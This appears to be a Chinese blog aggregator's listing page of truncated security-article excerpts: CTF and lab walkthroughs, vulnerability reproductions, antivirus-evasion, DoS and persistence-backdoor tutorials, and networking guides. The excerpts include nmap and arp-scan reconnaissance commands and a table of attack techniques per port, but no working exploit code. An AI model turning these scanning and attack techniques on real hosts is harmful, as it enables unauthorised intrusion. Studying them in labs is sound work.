搜索引擎 FOFA网络空间测绘：https://fofa.info/ FOFA（FOcus on Assets）是一个网络空间搜索引擎，可以帮助用户快速定位和收集特定目标的信息。 ZoomEye：https://www.zoomeye.org ZoomEye 是一个网络空间搜索引擎，可以用于发现和收集特定目标的网络设备、Web应用程序、开放…

二、安全与风险管理—风险管理

目录一、什么是风险及风险管理过程二、威胁建模三、主动攻击和被动攻击

华为设备VRP系统管理

为了满足企业业务对网络的需求，网络设备中的系统文件需要不断进行升级。另外，网络设备中的配置文件也需要时常进行备份，以防设备故障或其他灾害给业务带来损害。在升级和备份系统文件或配置文件时，经常会使用FTP和TFTP来传输文件。…

【免杀测试】Kali之Metasploit几款工具免杀练习

余磊不知攻，焉知防。作为渗透测试攻城狮，实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后，需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别，这时就催生出了免杀技术来绕过杀毒软件。下面就尝试…

全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解——windows应急响应篇

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【java】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 …

模糊测试：使用随机输入破坏事物

模糊测试：使用随机输入破坏事物一个简单的模糊器模糊测试外部程序创建输入文件调用外部程序长时间运行的模糊测试模糊测试器的发现缓冲区溢出缺少错误检查我们将从最简单的测试生成技术之一开始，随机文本生成（也称为模糊测试）的…

华为设备VRP基础

交换机可以隔离冲突域，路由器可以隔离广播域，这两种设备在企业网络中应用越来越广泛。随着越来越多的终端接入到网络中，网络设备的负担也越来越重，这时网络设备可以通过华为专有的VRP系统来提升运行效率。通用路由平台VRP&#xf…

【漏洞复现】浙大恩特CRM文件上传0day

漏洞描述浙大恩特客户资源管理系统任意文件上传漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用…

哪些软件可以监控电脑（保姆级教程！值得收藏！）

今天了解到了一个软件，真的把我吓到了。我才知道原来我上班时摸鱼时多么愚蠢的一件事情。原来老板可以通过一些软件轻而易举的知道你用电脑做的所有事情，怪不得我每次摸鱼时老板看我的眼神都不对…… 安装好域之盾软件以后，打开就能监控你使…

pwn：[NISACTF 2022]ReorPwn?

题目按正常方式走，发现指令被反着输出

BUUCTF [GUET-CTF2019]KO 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件得到一个.txt文本。解题思路： 1、结合题目提示和文本特征，可以确定为Ook！编码。 Ook. Ook. Ook. Ook. Ook. Ook…

中职组网络安全-FTPServer20221010.img（环境+解析）

任务环境说明： √服务器场景：FTPServer20221010.img √服务器操作系统：未知（关闭链接） √FTP用户名：attack817 密码：attack817 1.分析attack.pcapng数据包文件，通过分析数据包attack…

JTag 刷写TC397 的Flash

本文实现一个Trace32脚本的示例，用于连接JTAG端口并刷写基于TC397芯片的Flash： /SILENT /NOQUIET /OPENDEBUGGER /VERSION /IFCONNECTION JTAG /CPU TC397 ; 根据具体芯片的型号选择正确的CPU类型 /CONNECT /PROTOCOL JTAG /FREQUENCY 10000000 …

SD-WAN解决外贸企业网络问题

为了获取全球客户，占领更多的市场，越来越多的外贸企业出现。外贸企业在发展业务的过程中会遇到很多困难，海外网络访问问题就是其中之一。目前该问题主要有三种解决方案：VPN、MPLS专线以及SD-WAN专线。 VPN通过在公网上面建立专用网…

开源工具系列4：Nuclei

前言 Nuclei 用于基于模板跨目标发送请求，从而实现零误报并提供对大量主机的快速扫描。Nuclei 提供对各种协议的扫描，包括 TCP、DNS、HTTP、SSL、File、Whois、Websocket、Headless 等。凭借强大而灵活的模板，Nuclei 可用于对各种安全检查进…

BUUCTF——Reverse——xor

1、题目 2、工具 Exeinfo PE：查壳工具。IDA：是一款功能强大的反汇编工具，用于分析和逆向工程二进制文件。python：编写自动化脚本。 3、方法下载压缩包并解压，得到一个没有后缀的文件。用Exeinfo PE查询该文件是否…

浮动静态路由及负载均衡-新版（ 10）

目录整体拓扑操作步骤 1.基本配置 1.1 配置PC-1的IP地址 1.2 配置PC-2的IP地址 1.3 配置R1的IP 1.4 配置R2的IP 1.5 配置R3的IP 1.6 测试R1和PC-1直连链路的连通性 1.7 测试R3和PC-2直连链路的连通性 2.实现两分部间、总部与两分部间的通信 2.1配置R1静态路由 2…

ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建安装thinkphp6漏洞信息配置漏洞利用修复建议漏洞名称漏洞描述 2020年1月10日，ThinkPHP团队发布一个补丁更新，修复了一处由不安全的SessionId导致的任意文…

HackTheBox - Medium - Linux - Bagel

Bagel 今天我开始了《Red Team Development and Operations A Practical Guide》的学习，保持学习，后面差不多到时机后就学CRTOⅡ Bagel 是一款中等难度的 Linux 机器，其特点是电子商店容易受到路径遍历攻击，通过该攻击可以获取应…

河南省第五届“金盾信安杯”网络与数据安全大赛实操技能赛部分wp（自己的一些思路和解析）（主misc crypto ）

芜湖不评价以下仅是自己的一些思路和解析有什么问题或者建议随时都可以联系我目录题目一来都来了操作内容： flag值： 题目二 Honor 操作内容： flag值： 题目三我看看谁还不会RSA 操作内容： flag值&a…

热议：博士后申请国自然青基可“带走”、博士后是否要申请青基？

今年，国家自然科学基金委党组会议审议通过了《国家自然科学基金部分人才资助政策调整方案》。根据方案要求，自2023年7月4日起，取消面上项目、青年科学基金项目、地区科学基金项目不允许博士后变更依托单位的限制，对于经审核符合相…

P8A003-系统加固-系统管理员账户安全

【预备知识】 Administrator 原意为管理人或行政官员或遗产管理人，在计算机名词中，它的意思是系统超级管理员或超级用户。但是在Windows系统中此用户名只在安全模式中使用。【实验步骤】网络拓扑：server2008-basic windows server 2008 用户：administrator 密码：Ad…

一文带你了解网络安全简史

网络安全简史 1. 上古时代1.1 计算机病毒的理论原型1.2 早期计算机病毒1.3 主要特点 2. 黑客时代2.1 计算机病毒的大流行2.2 知名计算机病毒2.3 主要特点 3. 黑产时代3.1 网络威胁持续升级3.2 代表性事件3.3 主要特点 4 高级威胁时代4.1 高级威胁时代到来4.2 著名的APT组织4.3 …

反序列化漏洞详解（一）

目录一、php面向对象二、类 2.1 类的定义 2.2 类的修饰符介绍三、序列化 3.1 序列化的作用 3.2 序列化之后的表达方式/格式 ① 简单序列化 ② 数组序列化 ③ 对象序列化 ④ 私有修饰符序列化 ⑤ 保护修饰符序列化 ⑥ 成员属性调用对象序列化四、反序列化 …

计算机网络实验（六）：三层交换机实现VLAN间路由

一、实验名称：三层交换机实现VLAN间路由二、实验原理 2.1. VLAN基本配置在交换网络中，为了实现对物理网络的逻辑划分，引入了VLAN（虚拟局域网）的概念。VLAN通过将不同的设备划分到不同的虚拟网络中，实现了逻辑隔离。基本配置包括在交换机上创建VLAN、将端口划分到相应…

ubuntu远程桌面连接之vnc

一、前言 ubuntu安装图形化桌面以后,有些时候出于需要会想要进行远程桌面连接。ubuntu想要进行远程桌面连接就需要vnc服务的支持，安装vnc的方法有很多，博主也试过一些方式，但是安装完后使用vnc连接工具发现是花屏，无法正常使用。后来发现一种简单的方式即可配置好vnc连接，…

安全测试之SSRF请求伪造

前言 SSRF漏洞是一种在未能获取服务器权限时，利用服务器漏洞，由攻击者构造请求，服务器端发起请求的安全漏洞，攻击者可以利用该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。很多Web应用都提供了从其他的服务器上…

网站更换IP的四大注意事项

1.对网站当中的数据进行备份网站更换IP时可以将页面的数据库文件和站点文件通过下载工具在本地完成备份。 2.更换解析域名从站点域名管理后台当中更换域名地址，改为新的IP地址。 3.确保IP安全在用户更换IP前一定要确定IP是否安全，一旦IP存在不良…

gcc CFI控制流完整性保护

一、CFI简介 GCC的CFI（Control Flow Integrity，控制流完整性）机制是一种用于防止针对函数指针和虚函数表的攻击的保护机制。它通过在编译时对程序进行加固，限制了程序中可能的跳转目标，以提高程序运行时的安全性。下面…

Adobe ColdFusion文件读取漏洞（CVE-2010-2861）

任务一： 复现漏洞任务二： 尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件 1.环境搭建（网上写的密码是admin，就用admin） 2.看答案就是一层一层进行路径穿越攻击，这里要注意如果…

全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解——2023年国赛模拟题-linux应急响应

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步…

格密码基础：对偶格（超全面）

目录一. 对偶格的格点 1.1 基本定义 1.2 对偶格的例子 1.3 对偶格的图形理解二. 对偶格的格基 2.1 基本定义 2.2 对偶格的格基证明三. 对偶格的行列式 3.1 满秩格 3.2 非满秩格四. 重复对偶格五. 对偶格的转移定理（transference theorem&#xff…

【网络安全】Log4j 远程代码执行漏洞解析

一、简介 Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本，相比于 Log4j，Log4j2 在性能、可靠性和灵活性方面都有显著的改进。二、特点 Log4j2 是一个功能强大且灵活的日志记录框架，旨在提供高…

使用防火墙是否可以应对DDoS攻击?

很多游戏行业公司对网络安全不够了解，觉得装个防火墙就可以万事大吉了。实际上使用防火墙确实是解决DDoS攻击问题的一种有效方法，一些更先进的防火墙还可以采用其他防御措施，例如:深度包检测、行为分析、人工智能等，来识别和防御各…

CVE-2023-25717：Ruckus Wireless Admin 命令执行漏洞复现 [附POC]

文章目录 Ruckus Wireless Admin 命令执行（CVE-2023-25717）漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议Ruckus Wireless Admin 命令执行（CVE-2023-25717）漏洞复现 [附POC] 0x01 前言免责…

中继器，路由器，交换机，网关，网桥的作用及功能

中继器（RP repeater）是连接网络线路的一种装置，常用于两个网络节点之间物理信号的双向转发工作中继器是最简单的网络互联设备，主要完成物理层的功能，负责在两个节点的物理层上按位传递信息，完成信号的复制…

非对称加密与对称加密的区别是什么？

在数据通信中，加密技术是防止数据被未授权的人访问的关键措施之一。而对称加密和非对称加密是两种最常见的加密技术，它们被广泛应用于数据安全领域，并且可以组合起来以达到更好的加密效果。本文将探讨这两种技术的区别，以及它们在…

【中小型企业网络实战案例二】配置网络互连互通

【中小型企业网络实战案例一】规划、需求和基本配置-CSDN博客热门IT技术视频教程：https://xmws-it.blog.csdn.net/article/details/134398330?spm1001.2014.3001.5502 配置接入层交换机 1.以接入交换机ACC1为例，创建ACC1的业务VLAN 10和20。 <…

红队打靶练习:DIGITALWORLD.LOCAL: FALL

目录信息收集 1、arp 2、netdiscover 3、nmap 4、nikto 5、whatweb 6、小结目录探测 1、gobuster 2、dirsearch WEB 80端口 /test.php 文件包含漏洞 SSH登录提权 get root and flag 信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interfa…

burpsuite的安装与介绍

安装（挑一个你喜欢的版本安装就行）编程环境安装指南：Java、Python 和 Burp Suite抓包工具_burpsuite和java-CSDN博客简介 Burp Suite是一个用于攻击Web应用程序的集成平台。它集成了多种渗透测试组件，能够帮助我们更好地完成对Web应用的渗透测试和攻击，无论是自动化还…

【新资讯】《网络安全事件报告管理办法（征求意见稿）》正在公开征求意见

近年来网络安全事故频发，造成了不少损失和危害。为了减少网络安全事故的发生，规范网络安全事件的报告，国家互联网信息办公室根据《中华人民共和国网络安全法》等法律法规起草了《网络安全事件报告管理办法（征求意见稿）…

记一次应急响应练习（windows）

记一次应急响应练习（windows） windows： 1.请提交攻击者攻击成功的第一时间，格式：YY:MM:DD hh:mm:ss 答：2023/04/29:22:44:32 思路： 看见桌面的小皮面板，进入小皮的安装目录。发现…

sqlilabs第三十六三十七关

Less-36（GET - Bypass MySQL_real_escape_string) 手工注入单引号闭合（单引号自动转换的编码变了直接输入%27） 自动注入和上一关一样 Less-37（POST - Bypass MySQL_real_escape_string) 手工注入这个也是碰到过的情况接下…

【网络技术】【Kali Linux】Wireshark嗅探（一）ping和ICMP

一、实验目的本次实验使用wireshark流量分析工具进行网络嗅探，旨在了解ping命令的原理及过程。二、网络环境设置本系列实验均使用虚拟机完成，主机操作系统为Windows 11，虚拟化平台选择Oracle VM VirtualBox，组网模式选择“N…

#CCSP学习心得总结：2023年新收获CCSP云安全认证

源自：张同学选择CCSP的原因选择学习CCSP的原因比较简单，公司这几年开始发力布局云原生和云安全的业务，作为云安全相关知识领域的补充渠道，我对比了CCSP和CCSK，最终选择了综合性较高的CCSP。由于我之前已经拿下了CIS…

thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现

thinkcmf 文件包含 x1.6.0-x2.2.3 CVE-2019-16278 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述 ThinkCMF是一款基于PHPMYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制&a…

CSRF和SSRF原理、区别、防御方法

CSRF（Cross-Site Request Forgery）原理：CSRF是一种由攻击者构造形成，由服务端发起请求的一个安全漏洞。它是一种利用用户在已登录的网站中提交非法请求的行为，攻击者通过伪造用户提交的请求，将恶意请求发送…

【网络安全 | XCTF】2017_Dating_in_Singapore

正文题目描述： 01081522291516170310172431-050607132027262728-0102030209162330-02091623020310090910172423-02010814222930-0605041118252627-0203040310172431-0102030108152229151617-04050604111825181920-0108152229303124171003-261912052028211407-0405…

PHP序列化总结2--常见的魔术方法

魔术方法的概念 PHP的魔术方法是一种特殊的方法，用于覆盖PHP的默认操作。它们以双下划线（__）开头，后面跟着一些特定的字符串，如__construct()、__destruct()、__get()等。这些魔术方法在对象执行特定操作时被自动调用…

攻防技术1-网络攻击（HCIP）

目录一、网络攻击方式分类 1、被动攻击： 2、主动攻击： 3、中间人攻击： 二、网络攻击报文类型分类： 1、流量型攻击 2、单包攻击三、流量型攻击防范技术 1、DNS Request Flood攻击攻击原理 DNS交互过程 2、TCP类报文…

web：[BJDCTF2020]The mystery of ip（ssti模板注入、Smarty 模板引擎）

题目进入页面显示如下点击flag页面得到ip 点击hint页面在hint.php的源代码页面中发现由题目可以知道要从ip入手这里尝试抓包加上X-Forwarded-For请求头修改为127.0.0.1 因为直接将127.0.0.1输出到页面，可以猜测是ssti模板注入可以继续验证这里发现输入什么…

解析《个人信息保护法》实施以来主要的变化

文章目录前言一、二十一部配套的立法二、数据入表三、跨境规则转向四、未成年个人信息保护五、数据交易六、监管创新七、执法全覆盖八、地方聚焦场景执法九、个人信息保护诉讼十、个人信息保护公益诉讼十一、包容审慎十二、双清单上线十三、外部独立监督机构十四、个性化推荐便…

网络安全自学路线，千万不要学反了！

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

小白想学网络安全（黑客技术），我劝你还是算了吧

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

【网络安全 | 扫描器】御剑安装及使用教程详析

御剑是一款传统的Web网络安全综合检测程序，支持对PHP、JSP、ASPX等文件进行扫描，具备全扫描、网络安全扫描和主机安全扫描能力，方便发现网站漏洞。文章目录下载使用教程本文对御剑的安装及使用教程进行详析下载下载地址读者可自行上网…

黑客常用端口利用总结

常见端口渗透端口号端口说明攻击技巧21/22/69ftp/tftp：文件传输协议爆破、嗅探、溢出、后门22ssh：远程连接爆破、OpenSSH、28个退格23telnet：远程连接爆破、嗅探25smtp：邮件服务邮件伪造53DNS：域名系统DNS区域传输、…

OSPF被动接口配置-新版（14）

目录整体拓扑操作步骤 1.基本配置 1.1 配置R1的IP 1.2 配置R2的IP 1.4 配置R4的IP 1.5 配置R5的IP 1.6 配置PC-1的IP地址 1.7 配置PC-2的IP地址 1.8 配置PC-3的IP地址 1.9 配置PC-4的IP地址 1.10 检测R1与PC3连通性 1.11 检测R2与PC4连通性 1.12 检测R4与PC1连…

Jupyter NoteBook未授权访问漏洞

任务一： 复现未授权访问的漏洞任务二： 利用Jupter Notebook控制台执行系统命令，读取/etc/passwd内容 1.搭建环境 2.new下面直接进入终端，而且也不需要登录，我就直接进入了管理界面 3.直接把指令输入进入&#xf…

西工大计算机学院计算机系统基础实验一（函数编写11~14）

稳住心态不要慌，如果考试周冲突的话，可以直接复制这篇博客和上一篇博客西工大计算机学院计算机系统基础实验一（函数编写1~10）-CSDN博客最后的代码，然后直接提交，等熬过考试周之后回过头再慢慢做也可以。第…

$汽车网络安全--ISO\SAE 21434解析(一)$

汽车网络安全--ISO\SAE 21434解析(一)

目录 1.标准总览 2.示例分析 2015年美国黑帽大会，知名网络安全专家Charlie Miller和Chris Valasek详细描述了他们是如何在有限距离下通过WiFI入侵到Jeep大切诺基的中控系统，从此关于汽车网络安全的讨论拉开了序幕。 2016 年，ISO 道路车辆技术委员会与 SAE 联合成立 SC32/…

The Planets: Mercury

靶场环境整个靶场的环境，我出现了一点点问题，一直找不到主机的IP地址，后来参考了https://www.cnblogs.com/hyphon/p/16354436.html，进行了相关的配置，最后完成靶机环境的搭建！ 信息收集 # nmap -sn 192…

红队打靶练习:EVM: 1

目录信息收集 1、arp 2、netdiscover 3、nmap 4、nikto 5、whatweb 目录探测 1、gobuster 2、dirsearch WEB wpscan get username get password MSF get shell 提权 get root get flag 信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interf…

Fowsniff

靶场搭建遇到扫描不到的情况，可以尝试改靶机的网络为NAT模式，在靶机启动时按”esc“，进入Advanced options for Ubantu，选择recovery mode，选择network，按方向键”→“，OK，然后res…

第6章密码学和对称密钥算法

6.1 密码学基本知识 6.1.1 密码学的目标安全从业者可借助密码系统实现4个基本目标：保密性、完整性、身份认证和不可否认性。其中每个目标的实现都需要满足诸多设计要求，而且并非所有密码系统都是为达到所有4个目标而设计的。下面的小节将详细讲解这…

web：[GXYCTF2019]BabyUpload（文件上传、一句话木马、文件过滤）

题目页面显示为文件上传随便上传一个文件看看上传一个文本文件显示上传了一个图片显示上传包含一句话木马的图片上传了一个包含php一句话木马的文件，显示如上换一个写法上传成功尝试上传.htaccess，上传失败，用抓包修改文件后缀 …

Gitleaks - 一款高效的Github仓库敏感信息泄露查询工具

Gitleaks - 一款高效的Github仓库敏感信息泄露查询工具 1.工具概述2.安装3.参数解析4.使用1.工具概述 Gitleaks 是一种 SAST 工具，用于检测和防止 git 存储库中的硬编码机密，如密码、API 密钥和令牌 Gitleaks 是一个开源工具，用于检测和防止签入 Git 存储库的机密（密码/A…

Linux安全学习路标

1. 操作系统基础知识首先，你需要建立坚实的操作系统基础知识，包括Linux文件系统和目录结构、Linux进程管理、权限管理等基本概念。 2. 网络和通信安全学习关于网络和通信安全的基础知识，包括TCP/IP协议栈、网络攻击类型、防火墙配置、网…

听劝，不要试图以编程为基础去学习网络安全

目录一、网络安全学习的误区1.不要试图以编程为基础去学习网络安全2.不要刚开始就深度学习网络安全3.收集适当的学习资料4.适当的报班学习二、学习网络安全的些许准备1.硬件选择2.软件选择3.外语能力三、网络安全学习路线第一阶段：基础操作入门第二阶段：…

2023年网络安全比赛--Web综合渗透测试中职组（超详细）

一、竞赛时间 180分钟共计3小时二、竞赛阶段 1.通过URL访问http://靶机IP/1，对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交； 2.通过URL访问http://靶机IP/2，对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交； 3.通过URL访问http://靶机IP/3，对…

阿里云国际站-阿里云在其云峰会上推出新的直播电子商务解决方案

阿里云国际站宣布推出20多种新产品，包括云操作系统升级和云原生数据库。中国杭州，2021年6月8日——阿里巴巴集团的数字技术和智能骨干阿里云今天推出了新的一站式电子商务直播解决方案，以帮助全球各种规模的商家推出实时互动渠道&#xff0…

CDN绕过技术总汇

注本文首发于合天网安实验室首发链接：https://mp.weixin.qq.com/s/9oeUpFUZ_0FUu6YAhQGuAg 近日HVV培训以及面试，有人问了CDN该如何绕过找到目标真实IP，这向来是个老生常谈的问题，而且网上大多都有，但是有些不够全面…

[车联网安全自学篇] ATTACK安全之检测 Android APN 代理

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历 0x01 前言 Android是一种基于Linux的自由及开放源代码的操作系统，主要使用于移动设备，如智能手持设备和平板电脑，由Google…

HTB打靶(Active Directory 101 Multimaster)

Nmap扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-08 02:52 EST Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 55.85% done; ETC: 02:54 (0:00:40 remaining) Nmap scan report for 10.129…

【夏虫语冰】Win10局域网下两台电脑无法ping通: 无法访问目标主机

文章目录1、简介2、修改高级共享设置3、启用防火墙规则4、局域网内的其他主机访问NAT模式下的虚拟机4.1 虚拟机网络设置4.2 访问测试4.2.1 http测试4.2.2 curl测试4.2.3 telnet测试4.2.4 端口占用测试5、其他结语1、简介 ping 192.168.31.134ping主机ip时，访问无法…

后渗透之数据获取实验

一、实验项目名称后渗透之数据获取实验二、实验目的 1.掌握kali中连接mysql服务器的方法 2.掌握mysql获取敏感信息的sql语法三、实验内容通过已获取的数据库账号密码，通过socks代理流量，将kali中的mysql指令代理到目标内网，连接目标…

网络安全知识之什么是网络安全？

网络安全的概念，有很多不同的定义。在一些场合中，我们最多的考虑的还是网络的技术安全，但是技术延伸出来的安全又会涉及到社会安全、文化安全、国家安全等等。网络安全的概念，有很多不同的定义。在一些场合中，我们最多…

网络安全及网络安全评估的脆弱性分析

一、网络安全 （一）网络安全的定义　　网络安全是指计算机网络系统中的硬件、数据、程序等不会因为无意或恶意的原因而遭到破坏、篡改、泄露，防止非授权的使用或访问，系统能够保持服务的连续性，以及能够可靠的运行。网…

【网络安全入门】SQL注入是什么?SQL注入危害有哪些?

SQL注入是当今最危险、最普遍的基于Web的攻击方式之一，那么你知道SQL注入危害有哪些吗?SQL注入的位置包括什么?具体内容请看下文： SQL注入是什么? SQL注入是比较常见的网络攻击方式之一，主要是通过把SQL命令插入到Web表单递交或输入域名…

网络空间安全未来就业前景和就业方向，看着六点

一、网络空间安全行业发展前景做为新兴专业，现在是一级学科了，政府在全力支持，而且现在贸易战争、行动也是有点了不起，一不小心就盗取了各种各样国家秘密，更别提各种各样公司机密了，因此，你知…

[网鼎杯 2020 青龙组]AreUSerialz

目录信息收集代码审计前提知识思路分析绕过检测方法一 poc payload 方法二 poc payload 信息收集进入页面给出了源代码如下，是一道PHP的反序列化题目 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {pro…

ARP渗透与攻防(六)之限制网速攻击

系列文章 ARP渗透与攻防(一)之ARP原理 ARP渗透与攻防(二)之断网攻击 ARP渗透与攻防(三)之流量分析 ARP渗透与攻防(四)之WireShark截获用户数据 ARP渗透与攻防(五)之Ettercap劫持用户流量 ARP限制网速攻击大家没想到吧，ARP还能限制对方网速。当kali欺骗了网关和受…

HTB_Inclued_TFTP文件包含与LXD提权

文章目录信息收集TFTPLXD 提权环境安装报错信息收集开放80端口，url为http://ip:port?filehome.php 测试文件包含，本地包含成功，远程失败，尝试上传后门木马反弹shell 根据图示，网站目录为var/www，其他功…

为什么说企业要尽早搭建统一身份目录？

某上市公司运维部门的烦恼上世纪90年代初，某台资企业进入大陆市场拓展业务，至21世纪初在香港上市，该企业在大陆已有十余个分支机构，员工总数更是多达8000人。与快速扩张的业务相比，该企业数字化转型却停滞不前。由于…

操作系统权限维持（十一）之Linux系统-SSH Wrapper后门

系列文章操作系统权限维持（一）之Windows系统-粘贴键后门操作系统权限维持（二）之Windows系统-克隆账号维持后门操作系统权限维持（三）之Windows系统-启动项维持后门操作系统权限维持（四&…

[网鼎杯 2020 白虎组]PicDown（精讲）

目录前提知识 urllib 包含environ proc目录解题过程信息收集思路分析命令执行外带前提知识 urllib import urllib url"/etc/passwd" res urllib.urlopen(url) print(res.read()) python2的urllib的urlopen，和urllib2中的urlopen明显区别就…

【黑客技术】Hping攻击实验

一、重要声明请勿攻击公网！请勿攻击公网！请勿攻击公网！ 一切责任自负！一切责任自负！一切责任自负！ 二、工具介绍 hping3是一款面向TCP/IP协议的免费的数据包生成和分析工具。Hping是用于对防火墙和网络…

W1R3S

下载地址安装直接丢到vm中 1、主机发现 sudo nmap -sn 10.200.32.0/24在靶机开启之前，用Nmap扫描一下开启后，在进行扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:00 CST │Nmap scan report for 10.200.32.2 │Host is up (0.000…

【网络安全】记一次红队渗透实战项目

一、信息收集信息收集非常重要，有了信息才能知道下一步该如何进行，接下来将用 nmap 来演示信息收集 1、nmap 扫描存活 IP 由于本项目环境是 nat 模式需要项目 IP 地址，扫描挖掘本地的 IP 地址信息： 本机 IP 为：192…

ToBeWritten之Android/物联网各层防御措施

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

Vulnhub:Digitalworld.local (Development)靶机

kali：192.168.111.111 靶机：192.168.111.130 信息收集端口扫描 nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.130 查看网站首页源码访问development目录，提示存在一个流量包查看流量包发现另一个网站路径：/devel…

网络安全之从原理看懂 XSS

01、XSS 的原理和分类跨站脚本攻击 XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets，CSS)的缩写混淆故将跨站脚本攻击缩写为 XSS，恶意攻击者往 Web 页面里插入恶意 Script 代码，当用户浏览该页面时&…

【网络技术】HULK攻击实验

一、重要声明请勿攻击公网！请勿攻击公网！请勿攻击公网！ 一切责任自负！一切责任自负！一切责任自负！ 二、工具介绍 HULK（Http Unbearable Load King，字面意思是“不能承受的HTTP&a…

网络安全相关的知识

一、什么是IDS？ IDS是英文"Intrusion Detection Systems"的缩写，中文意思是"入侵检测系统"。专业上讲就是依照一定的安全策略，通过软、硬件，对网络、系统的运行状况进行监视，尽可能发现各种攻击…

安全芯片密码GMT0008-2012

安全芯片是一种重要的基础安全功能单元，在计算机、信息与通信系统中应用非常广泛。特别地， 多数安全芯片都具有一种或多种密码功能。安全芯片在实现的密码算法的基础上，根据设计和应用的不同须具有一种或多种安全能力。本标准将安全能力划分…

软件系统的安全漏洞

安全漏洞软件系统的安全漏洞是指能够被黑客或恶意攻击者利用的安全漏洞或弱点。以下是一些常见的安全漏洞： 输入验证漏洞：输入验证不充分，可能导致攻击者注入恶意代码或绕过安全控制。缓冲区溢出漏洞：如果程序没有正确限制输入…

web渗透安全学习笔记：1、入门基础知识/ XXS漏洞

前言自编写python渗透工具编写学习笔记专栏以来，笔者便发现了一个较为严重的问题：我们大多数文章都是学习如何用python编写扫描与利用漏洞的渗透工具，却没有真正解析漏洞的形成原因，长此以往我们的学习就只会浮于表面&#xff0c…

AS-V1000 视频监控平台产品介绍：客户端功能介绍（二）

目录一、引言 1.1 AS-V1000视频监控平台介绍 1.2平台服务器配置说明二、软件概述 2.1 客户端软件用途 2.2 客户端功能三、客户端功能说明 3.1录像回放 3.1.1录像回放界面 3.1.2录像查询及回放 3.1.3视频窗口工具 3.1.4右键工具 3.1.5全局工具 3…

Packet Tracer - Configure IOS Intrusion Prevention System (IPS) Using the CLI

Packet Tracer - 使用CLI配置IOS入侵防御系统（IPS） 地址表目标启用IOS入侵防御系统（IPS）。配置日志记录功能。修改IPS签名规则。验证IPS配置。背景/场景您的任务是在R1上启用IPS，扫描进入192.168.1.0网络…

DC-7靶机渗透详细流程

信息收集： 1.存活扫描： 由于靶机和kali都是nat的网卡，都在一个网段，我们用arp-scan会快一点： arp-scan arp-scan -I eth0 -l └─# arp-scan -I eth0 -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6…

宽字节注入漏洞原理以及修复方法

漏洞名称:宽字节注入漏洞描述: 宽字节注入是相对于单字节注入而言的，该注入跟HTML页面编码无关，宽字节注入常见于mysql中，GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问…

【BUUCTF N1BOOK】[第二章 web进阶] 通关

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…

查看系统进程信息的Tasklist命令

Tasklist命令是一个用来显示运行在本地计算机上所有进程的命令行工具，带有多个执行参数。另外，Tasklist可以代替Tlist工具。通过任务管理器，可以查看到本机完整的进程列表，而且可以通过手工定制进程列表方式获得更多进程信息&…

Java安全 CC链1分析(Lazymap类)

